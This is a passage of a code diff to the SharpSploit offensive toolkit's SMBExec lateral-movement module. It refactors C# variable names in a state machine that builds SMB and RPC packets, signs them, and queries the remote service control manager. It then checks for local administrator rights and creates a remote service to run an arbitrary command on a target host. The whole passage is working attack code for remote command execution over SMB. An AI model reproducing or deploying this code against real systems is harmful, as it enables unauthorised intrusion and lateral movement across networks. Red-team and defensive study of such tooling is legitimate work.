-                                        SMB_client_send = NetBIOS_Session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "RPCBind";
 
                                     }
@@ -1541,117 +1541,112 @@ namespace SharpSploit.LateralMovement
                                 case "RPCBind":
                                     {
                                         SMB_FID = Utilities.GetByteRange(SMBClientReceive, 42, 43);
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
-                                        if (SMB_signing)
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x00, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        int RPC_data_length = SMB_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
-                                        {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_RPC_Data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x00, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
 
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                        if (SMB_Signing)
+                                        {
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
+
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
 
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "ReadAndXRequest";
-                                        SMB_client_stage_next = "OpenSCManagerW";
+                                        SMB_Client_Stage_Next = "OpenSCManagerW";
                                     }
                                     break;
                                 case "ReadAndXRequest":
                                     {
                                         Thread.Sleep(sleep * 1000);
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2e }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
-                                        if (SMB_signing)
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2e }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBReadAndXRequest(SMB_FID);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-
-                                        if (SMB_signing)
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBReadAndXRequest(SMB_FID);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
-                                            byte[] SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature2;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
-                                        SMBClientStage = SMB_client_stage_next;
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
+                                        SMBClientStage = SMB_Client_Stage_Next;
                                     }
                                     break;
 
                                 case "OpenSCManagerW":
                                     {
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
-                                        if (SMB_signing)
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
 
-                                        OrderedDictionary packet_SCM_data = SMBExec.SCMOpenSCManagerW(SMB_service_bytes, SMB_service_length);
-                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, (RPC_data.Length + SCM_data.Length));
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_Data);
-                                        int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_NetBIOS_Session_Service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_Session_Service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_Session_Service);
-                                        if (SMB_signing)
+                                        Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_bytes, SMB_Service_Length);
+                                        SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, (RPC_Data.Length + SCM_Data.Length));
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
+
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_Session_Service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "ReadAndXRequest";
-                                        SMB_client_stage_next = "CheckAccess";
+                                        SMB_Client_Stage_Next = "CheckAccess";
                                     }
                                     break;
                                 case "CheckAccess":
                                     {
                                         if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
                                         {
-                                            SMB_service_manager_context_handle = Utilities.GetByteRange(SMBClientReceive, 88, 107);
+                                            SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 88, 107);
                                             if (SMB_execute)
                                             {
-                                                OrderedDictionary packet_SCM_data = SMBExec.SCMCreateServiceW(SMB_service_manager_context_handle, SMB_service_bytes, SMB_service_length, SMBExec_command, SMBExec_command_length_bytes);
-                                                SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                                if (SCM_data.Length < SMB_split_index)
+                                                Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
+                                                SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                                if (SCM_Data.Length < SMB_Split_Index)
                                                 {
                                                     SMBClientStage = "CreateServiceW";
                                                 }
@@ -1662,15 +1657,15 @@ namespace SharpSploit.LateralMovement
                                             }
                                             else
                                             {
-                                                output.AppendLine(String.Format("{0} is a local administrator on {1}", output_username, target));
-                                                SMB_close_service_handle_stage = 2;
+                                                output.AppendLine(String.Format("{0} is a local administrator on {1}", Output_Username, Target));
+                                                SMB_Close_Service_Handle_Stage = 2;
                                                 SMBClientStage = "CloseServiceHandle";
                                             }
 
                                         }
                                         else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "05-00-00-00")
                                         {
-                                            output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", output_username, target));
+                                            output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", Output_Username, Target));
                                             return output.ToString();
                                         }
                                         else
@@ -1680,7 +1675,7 @@ namespace SharpSploit.LateralMovement
                                                 output.AppendLine(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)));
                                                 output.AppendLine(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)));
                                             }
-                                            output.AppendLine(String.Format("Something went wrong with {0}", target));
+                                            output.AppendLine(String.Format("Something went wrong with {0}", Target));
                                             return output.ToString();
                                         }
 
@@ -1690,119 +1685,115 @@ namespace SharpSploit.LateralMovement
 
                                 case "CreateServiceW":
                                     {
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
-                                        if (SMB_signing)
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
 
-                                        OrderedDictionary packet_SCM_data = SMBExec.SCMCreateServiceW(SMB_service_manager_context_handle, SMB_service_bytes, SMB_service_length, SMBExec_command, SMBExec_command_length_bytes);
-                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length + SCM_data.Length);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
-                                        {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
+                                        Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
+                                        SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
 
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                        if (SMB_Signing)
+                                        {
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "ReadAndXRequest";
-                                        SMB_client_stage_next = "StartServiceW";
+                                        SMB_Client_Stage_Next = "StartServiceW";
                                     }
                                     break;
                                 case "CreateServiceW_First":
                                     {
-                                        SMB_split_stage_final = Math.Ceiling((double)SCM_data.Length / SMB_split_index);
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
-                                        if (SMB_signing)
+                                        SMB_Split_Stage_final = Math.Ceiling((double)SCM_Data.Length / SMB_Split_Index);
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SCM_data_first = Utilities.GetByteRange(SCM_data, 0, SMB_split_index - 1);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_first);
-                                        packet_RPC_data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_data.Length);
-                                        SMB_split_index_tracker = SMB_split_index;
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        int RPC_data_length = SMB_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        byte[] SCM_Data_First = Utilities.GetByteRange(SCM_Data, 0, SMB_Split_Index - 1);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_First);
+                                        Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length);
+                                        SMB_Split_Index_Tracker = SMB_Split_Index;
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
+
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
-                                        if (SMB_split_stage_final <= 2)
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
+                                        if (SMB_Split_Stage_final <= 2)
                                         {
                                             SMBClientStage = "CreateServiceW_Last";
                                         }
                                         else
                                         {
-                                            SMB_split_stage = 2;
+                                            SMB_Split_Stage = 2;
                                             SMBClientStage = "CreateServiceW_Middle";
                                         }
                                     }
                                     break;
                                 case "CreateServiceW_Middle":
                                     {
-                                        SMB_split_stage++;
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
-                                        if (SMB_signing)
+                                        SMB_Split_Stage++;
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SCM_data_middle = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SMB_split_index_tracker + SMB_split_index - 1);
-                                        SMB_split_index_tracker += SMB_split_index;
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_middle);
-                                        packet_RPC_data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_data.Length - SMB_split_index_tracker + SMB_split_index);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        int RPC_data_length = SMB_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        byte[] SCM_Data_Middle = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SMB_Split_Index_Tracker + SMB_Split_Index - 1);
+                                        SMB_Split_Index_Tracker += SMB_Split_Index;
